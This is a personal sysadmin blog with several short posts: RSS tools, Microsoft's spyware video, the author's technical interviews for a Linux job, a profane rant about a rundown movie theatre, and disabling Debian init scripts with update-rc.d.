A friend of mine told me about an RSS agregator that emails you called rss2email. Pretty cool, and written in Python as well. The problem I have is I don't have a machine to run such as script on.

In the latest Linux Journal there was an article about Bloglines. This is a free web service that lets you subscribe to RSS feeds. It even has a public API to use in scripts. It's very cool, and I've started using it to keep track of blogs.

Well it seems Microsoft has released (or rather rebranded) a spyware removal tool. Haven't checked it out, but might be worth it.

What I found rather funny was the spyware education video linked above. My favorite quote:

On my "How dangerous is it?" scale, I give it a medium. Spyware is like having an intruder in your home.

Yeah, having an intruder in my home, I would consider that medium risk also. I also loved how she explains how much better it would be if spyware companies had license agreements we could read and accept. Then we'd never have spyware. Microsoft is magnificent at blaming users for bugs in their OS.

I've setup a new blog for Prashant Chopra, a co-worker of mine. He's moving to California to take a cool job there. You can reach his blog from the Prashant tab at the top.

Well I've been interviewing candidates to replace me at my current employer. It has been an interesting experience. We are looking for someone with good Linux skills, and I posted the job on the Florida Linux User's Group job mailing list. I got quite a few responses.

I have a pretty tough interview process, consisting of 85 or so technical questions consisting of things like coding small programs, troubleshooting, networking, binary arithmetic, and other topics. I purposefully scatter the questions around, so that the topic jumps around quite a bit, and maybe comes back to a topic already discussed. Some people get stunned by this, but it's my way of determining how this person deals with completely different problems one after another. Part of it involves also admitting defeat, in that they must now forget about the previous problem they got wrong, and think about a new problem. A few candidates would even have a eureka moment and realize an answer to a previous question. That sort of shows them actually multitasking. That's really what sysadmin involves.

I don't expect anyone to get all of the answers, and so far the highest score anyone has got is 81%. I was very impressed with this person. The lowest score so far is 33%.

I try my best not to humiliate anyone. But I don't make it easy for them either. If you claim to know something or have it on your resume, I'm going to ask you about it. The problem I have with candidates is the blatant lying on resumes. I had one person claim to know PERL but could not tell me what the split() function does. Then another claiming to know SQL, but could not give me an example of using a select statement. Then another claiming to know bash but could not tell me how to set an environment variable.

Please, please, please make sure you know more than just what the acronyms stand for on your resume. Personality and confidence are great, but if you cannot backup the knowledge you claim to have, you will be considered more a liar than anything else.

This weekend I had checked out The Incredibles again. Great movie, but this blog is not a review. After reading a friend's blog, I thought about how crappy movie theatres are becoming. The AMC Sheridan 12 is probably the worst fucking theatre I've ever been in. Every movie I've watched here has had one stupid problem after another.

First you have the near catatonic popcorn vendors who are about as speedy as Night of the Living Dead extras. No problem, I know they hate their job. I'll cut them some slack. But I sensed the aggravation of the rest of the people in the line, but no one spoke up.

Then I get in the theatre and during the trailers the film slowly spun down like an unplugged record player to a complete stop. A few minutes later it comes back, but there are all sorts of artifacts on the screen. No one seems to notice. Ok, now I think I may be setting a higher standard since I'm so used to HDTV. So I'll ignore them.. then I notice the focus is pretty bad. Now on a CG film, being out of focus stands out ALOT more than non-CG.

At this point, I'm expecting the whole experience to be crap. Luckily, I'm using an AMC gift card (i.e. I didn't have to pay for this shit). Next, throughout the movie the center channel was completely fucked up, coming on and off with loud static noises when it would do so. I'm looking around, and no one is doing shit. It's like people are coming from their black and white antenna-based TVs at home to this crap! WTF?

Finally I go out to complain, and to my relief someone has already complained about the sound. Their solution? Turn off the center channel. Yeah that sounds fucking great.

Seeing a movie like this makes me want to pirate it! Fix your fucking movie theatres please!

As much as I enjoy a fresh pill of Cialis every day to give me that pep in the morning, I had to remove the recent/top referers links because of referer spamming.

I've been testing a few things on Debian that require additional daemons to be started (ldap, apache, samba, exim). I left them on and my bootup was getting kinda slow. So began my quest to understand the Debian initscripts.

Generally they are the same as Red Hat, with /etc/rcN.d/ directories corresponding to the runlevels. Now what I wanted to do was disable the inetd service from starting. On Red Hat, I would do something like:

chkconfig --level 2345 inetd off

How to do it in Debian? After a bit of searching on Google, I came across some recommendations to do:

update-rc.d -f inetd remove

Which actually works, but you lose the original startup order. Let's say inetd used 33 (i.e. S33inetd), the 33 appears not to be stored anywhere. On Red Hat, this was stored in the rc script itself for chkconfig. The only way I could restore this information is re-installing the package, which is kinda lame. Worse, if ever the inetd package is updated, the initscripts would be recreated! This is just retarded and I was beginning to see that update-rc.d should not be used for administration.

I did some more research and it turns out the remove method of update-rc.d is not recommended for what I'm trying to do. In fact, the Debian Security HOWTO cautions against it as well. That text and some users recommend that the /etc/rcN.d/S??service script be removed. Ok I can do that, but how does that remember the startup order? I still have to resort to re-installing the package to get it in the original state.

Ugh, I hate when only half of my question is answered. Yes, Debian truly is an elitist distro.